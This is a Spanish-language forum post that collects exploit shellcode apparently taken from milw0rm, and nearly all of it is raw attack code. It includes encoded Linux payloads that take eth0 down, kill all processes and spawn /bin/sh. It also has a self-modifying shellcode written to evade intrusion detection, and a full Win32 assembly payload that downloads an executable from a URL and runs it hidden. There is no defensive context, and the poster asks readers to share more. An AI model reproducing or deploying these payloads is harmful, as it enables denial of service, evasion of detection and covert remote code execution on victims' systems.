Autor
75 Bytes - Desactivar la tarjeta de red:
Código
* 08048060 <_start>:
* 8048060: 6a 0b push $0xb
* 8048062: 58 pop %eax
* 8048063: 99 cltd
* 8048064: 52 push %edx
* 8048065: 68 64 6f 77 6e push $0x6e776f64
* 804806a: 89 e6 mov %esp,%esi
* 804806c: 52 push %edx
* 804806d: 68 65 74 68 30 push $0x30687465 < (eth0) you can change it for other Network card
* 8048072: 89 e1 mov %esp,%ecx
* 8048074: 52 push %edx
* 8048075: 68 6e 66 69 67 push $0x6769666e
* 804807a: 68 69 66 63 6f push $0x6f636669
* 804807f: 68 69 6e 2f 2f push $0x2f2f6e69
* 8048084: 68 2f 2f 73 62 push $0x62732f2f
* 8048089: 89 e3 mov %esp,%ebx
* 804808b: 52 push %edx
* 804808c: 56 push %esi
* 804808d: 51 push %ecx
* 804808e: 53 push %ebx
* 804808f: 89 e1 mov %esp,%ecx
* 8048091: cd 80 int $0x80
*
*/
main()
{
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x51\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x6b\x0c\x59\x9a\x53\x69\x65\x70"
"\x78\x6f\x8a\xe7\x53\x69\x66\x75"
"\x69\x31\x8a\xe2\x53\x69\x6f\x67"
"\x6a\x68\x69\x6a\x67\x64\x70\x69"
"\x6a\x6f\x30\x30\x69\x30\x30\x74"
"\x63\x8a\xe4\x53\x57\x52\x54\x8a"
"\xe2\xce\x81";
61 Bytes - Cerrar todos los procesos de sistema(KillAll):
Código
char shellcode[] =
"\xeb\x11\x5e\x31\xc9\xb1\x37\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x32\xc1\x51\x67\x69\x6d\x36\x69"
"\x6d\x6d\x62\x6d\x69\x6f\x30\x6c"
"\x6a\x69\x30\x74\x63\x6a\x8a\xe4"
"\x51\x8a\xe3\x54\x8a\xe2\xb1\x0c"
"\xce\x81\x41\xce\x81";
48 Bytes - /bin/sh (Lanzador):
Código
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x32\xc1\x51\x69\x30\x30\x74\x69"
"\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
"\x54\x8a\xe2\x9a\xb1\x0c\xce\x81";
64 Bytes - Shellcode self-modifying para evadir IDS:
Código
.globl _start
_start:
jmp _findOut
_WhereAmI:
pop %edx // Save our payload's address g20
mov %edx, %esi // and save it 4 later
_loopMakeInt80s:
mov (%edx), %eax
cmpw $0x7dca, %ax // Find this guy ( 0x7dca ) and
jne _no
addw $0x303, %ax // 0x7dca + 0x303 == 0x80cd ( int $0x80 )
mov %eax, (%edx)
_no:
incb %dl
cmp $0x41414141, %eax // Use 'AAAA' as end Marker.
jne _loopMakeInt80s
jmp *%esi // Jump to our converted code when done
_findOut:
call _WhereAmI
_payload: // Paste your shell code here and then replace
xor %edx, %edx // "\xcd\x80" (int $0x80) for .ascii "\xca7d"
push $0xb // and end with .ascii "AAAA" as end marker
pop %eax
cltd
push %edx
push $0x68732f2f
push $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
.ascii "\xca\x7d" // + 0x303 = 0xcd80 (int $0x80)
.ascii "AAAA"
=== SOURCE CODE ====
*/
char shellcode[] = \xeb\x1c\x5a\x89\xd6\x8b\x02\x66
\x3d\xca\x7d\x75\x06\x66\x05\x03
\x03\x89\x02\xfe\xc2\x3d\x41\x41
\x41\x41\x75\xe9\xff\xe6\xe8\xdf
\xff\xff\xff\x31\xd2\x6a\x0b\x58
\x99\x52\x68\x2f\x2f\x73\x68\x68
\x2f\x62\x69\x6e\x89\xe3
\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41";
124 Bytes - Win32 Download and execute Payload:
Código
.386
.model flat,stdcall
ROL_CONSTANT equ 5
mrol macro iNum:req,iBits:req
exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm
mror macro iNum:req,iBits:req
exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm
hashapi macro szApi
local dwApi
dwApi = 0
forc x,szApi
dwApi = dwApi + '&x'
dwApi = mrol(dwApi,ROL_CONSTANT)
endm
dwApi = mrol(dwApi,ROL_CONSTANT)
dw (dwApi and 0ffffh)
endm
.code
assume fs:nothing
code_start:
jmp load_data
IFDEF TEST_CODE
extern URLDownloadToFileA :proc
call URLDownloadToFileA ; included when assembled with /DTEST_CODE
ENDIF
setup_parameters:
pop edi ; offset @cmd_start
xor eax,eax ; eax = 0
cdq ; edx = 0
; ********************************************************************
push eax ; exit code = 0
; ********************************************************************
push eax ; SW_HIDE
mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes
push edi ; file name to execute
; ********************************************************************
push eax ; callback routine URLDownLoadToFileA
push eax ; reserved, must be zero
push edi ; file name to save as
add edi,edx ; get offset of @url_start-1
stosb ; zero tail end
mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url
push edi ; url to download file from
push eax ; interface
add edi,edx ; get offset of @urlmon-1
stosb ; zero tail end of url
; *********************************************************************
load_modules:
push edi ; save current offset to hashes
push 30h
pop ecx
mov eax,fs:[ecx] ; PEB base address
mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData
mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList
scan_dll:
mov ebx,[ebp+8] ; DllBase
mov ebp,[ebp] ; Flink
push ebp ; save
mov eax,[ebx+3ch]
mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT
lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames
lodsd
xchg eax,ecx ; ecx = NumberOfNames
lodsd
add eax,ebx ; AddressOfFunctions
push eax
lodsd
lea edi,[eax+ebx] ; AddressOfNames
lodsd
lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals
load_api:
mov esi,[edi+4*ecx-4]
add esi,ebx
xor eax,eax
cdq
hash_api:
lodsb
add edx,eax
rol edx,ROL_CONSTANT
dec eax
jns hash_api
mov esi,[esp+8] ; get api hashes
cmp dx,word ptr[esi] ; found a match?
je call_api
loop load_api
pop eax ; check
pop ebp ;
jmp scan_dll
call_api:
pop eax
movzx edx,word ptr [ebp+2*ecx-2]
add ebx,[eax+4*edx]
pop ebp ; modules
pop edi ; api hashes
call ebx ; call api
stosw ; advance 2 bytes to next hash
jmp load_modules ; do another, just keep going until ExitProcess is reached.
; *************************
load_data:
call setup_parameters
@cmd_start:
db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE);
@cmd_end:
@url_start:
db 'http://127.0.0.1/file.exe',0ffh ; url of file to download
@url_end:
hashapi <URLDownloadToFileA>
hashapi <WinExec>
hashapi <ExitProcess>
24 Bytes - Hacer BEEP!:
Código
char[] shellcode = "\x33\xC0\xB8\x8F\x7A\x83\x7C\x68\x00\x04\x00\x00\x68\x00\x03\x00\x00\xFF\xD0\x33\xC0\xB8\xFA\xCA\x81\x7C\xFF\xD0";
Esos son los mas interesantes que he visto por milw0rm, haber si conoceis alguno mas.
Saludos
En línea
. Estúpido Win7 
.
. Bueno, pos unos bytes que se ahorran 
.
.
